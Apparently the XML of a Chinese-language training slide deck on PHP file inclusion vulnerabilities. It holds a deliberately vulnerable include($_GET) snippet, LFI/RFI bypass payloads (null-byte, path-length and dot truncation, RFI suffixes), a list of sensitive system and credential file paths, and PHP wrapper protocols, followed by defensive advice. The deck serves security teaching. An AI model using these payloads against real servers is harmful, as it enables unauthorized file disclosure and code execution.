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ASUS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88"/>
    <a:srgbClr val="333333"/>
    <a:srgbClr val="0B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084"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="106" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2367"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-209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91-0E21-43A0-99BF-C68B11572A2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2C492-2B8C-43C6-A74C-4A410CC2D6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3E681-7DAD-43E1-B03D-9E59A72F1C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0768"/>
            <a:ext cx="5150396" cy="48361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03404" y="1340768"/>
            <a:ext cx="5150396" cy="4836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2600" y="6172200"/>
            <a:ext cx="28194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282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2209800" y="3805665"/>
            <a:ext cx="7772400" cy="795337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>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx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文件包含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本地文件包含漏洞绕过方式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%00截断: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/>
              <a:t>条件:magic quotes gps=off php版本&lt;5.3.4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/>
              <a:t>?page=../..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>../../phpinfo.php%00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/>
              <a:t>php内核由c语言实现，因此使用了c语言中的字符串处理函数，在连接字符串时0字节作为字符串的结束符，%00url解码为0x00，magic_quotes_gps开启时会将%00转义为\0的两个单体字符，故不具备截断功能。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%00截断目录遍历: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/>
              <a:t>条件:magic quotes gps=off unix文件系统,比如FreeBSD,OpenBSD,NetBSD,Solaris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000"/>
              <a:t>?page=..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>../var/www/%00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1268730"/>
            <a:ext cx="7033895" cy="69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本地文件包含漏洞绕过方式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路径长度截断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条件:php版本小于5.2.8，Windows下目录最大长度为256字节，超出的部分会被丢弃linux下目录最大长度为4096字节，超出的部分会被丢弃。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?page=.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>./.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>./phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>././././....]/././././././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点号截断:条件:php版本小于5.2.8，只适用于Windows操作系统，点号需长于256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?page=..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>../phpinfo.php.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.......[.....]......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195" y="1412875"/>
            <a:ext cx="475297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远程文件包含漏洞绕过方式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http://ip/xxx.php?file=http://ip/test.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码实际执行了：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>require_once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://ip/xxx.php?file=http://ip/test.php?/action/m_share.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/action/m_share.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://ip/test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的查询字符串</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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http://ip/xxx.php?file=http://ip/test.php%23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http://ip/xxx.php?file=http://ip/test.php%20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pP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920" y="1340485"/>
            <a:ext cx="39878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文件包含漏洞危害及防御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危害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获取敏感信息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执行任意命令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获取服务器权限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文件包含漏洞危害及防御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800"/>
              <a:t>防御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尽量不使用动态包含，无需情况下设置allow url include和allow_url fopen为关闭;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对可以包含的文件进行限制:使用白名单的方式，或者设置包含的目录，open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>严格检查用户输入，参数中不允许出现../之类的目录跳转符;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严格检查变量是否初始化;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不要仅仅在客户端做数据的验证与过滤，关键的过滤步骤在服务端进行。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文件包含漏洞概述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什么是文件包含？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开发人员将需要重复调用的函数写入一个文件，对该文件进行包含时产生的操作。这样编写代码能减少代码冗余，降低代码后期维护难度。保证网站整体风格统一：导航栏、底部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>footer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>栏等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="45720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漏洞产生原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件包含函数加载的参数没有经过过滤或严格定义，可以被用户控制，包含其他恶意文件，导致了执行非预期代码。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  <a:p>
            <a:pPr marL="0" lvl="0" indent="45720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文件包含漏洞概述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800"/>
              <a:t>常见漏洞代码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&lt;?php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$filename=$_GET[‘filename’];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include($filename);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?&gt;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访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>URL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http://xxx/xxx.php?filename=test.php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改变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>值即可改变代码中包含的文件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文件包含漏洞概述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> - 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中的文件包含函数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/>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>组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require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>：函数出现错误时，会直接报错并退出程序执行。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require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>：出错时直接退出；且仅包含一次。在脚本执行期间同一个文件可能被多次引用，确保只包含一次以避免函数重定义、变量重新赋值等问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>组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include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>：函数出现错误时，会抛出一个警告，程序继续运行。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include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>：函数出现错误时，会抛出警告，且仅包含一次。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文件包含漏洞类型及利用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本地文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LFI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/>
              <a:t>被包含的文件在服务器本地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利用方式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/>
              <a:t>包含本地敏感文件、上传文件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  <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）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/>
              <a:t>被包含的文件在远程服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用方式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/>
              <a:t>包含攻击者指定远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL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敏感文件常见路径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Windows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 sz="2800"/>
              <a:t>C:\boot.ini		//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>查看系统版本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C:\Windows\system32\inetsrv\MetaBase.xml	//iis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>配置文件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C:\Windows\repair\same	//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>系统初次安装密码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C:\ProgramFiles\mysql\my.ini	//MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>配置信息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C:\ProgramFiles\mysql\data\mysql\user.MYD	//MySQL root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>密码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C:\Windows\php.ini		//php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>配置信息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敏感文件常见路径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Linux/unix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sz="2400"/>
              <a:t>/etc/passwd							//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>账户信息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/etc/shadow							//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>账户密码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/usr/local/app/apache2/conf/http.conf			//apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>默认配置文件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/usr/local/app/apache2/conf/extra/http-vhost.conf		//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>虚拟网站配置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/usr/local/app/php5/lib/php.ini				//php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>相关配置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/etc/httpd/conf/http.conf					//apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>配置信息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/etc/my.conf							//mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>配置文件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本地文件包含漏洞利用方式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本地文件包含配合日志文件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file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议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php://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议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zip://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bzip2://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>zlib://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议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phar://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远程文件包含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包含远程文件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php://input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议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data://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PP_MARK_KEY" val="261e2dca-833b-4d2c-b3be-0e1d7fc3a61c"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiOTJmMjU0YjkxYmJkNmRhZDFlY2ViMDcwNDc0MTFhOTIifQ=="/>
  <p:tag name="commondata" val="eyJoZGlkIjoiMDEwNDIxMzdhYzU4YjM2M2E2NTk5ODEyM2U4ODg5MjM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2291</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>126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Calibri Light</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>默认设计模板</vt:lpstr>
      <vt:lpstr>文件包含</vt:lpstr>
      <vt:lpstr>文件包含漏洞概述</vt:lpstr>
      <vt:lpstr>文件包含漏洞概述</vt:lpstr>
      <vt:lpstr>文件包含漏洞概述 - PHP中的文件包含函数</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>敏感文件常见路径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PPT课程标题</dc:title>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>一枚木木夕</cp:lastModifiedBy>
  <cp:revision>292</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-06T01:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-04T20:10:18Z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E7CA9CB11F16413E9620898F42CD7FFB</vt:lpwstr>
  </property>
</Properties>
</file>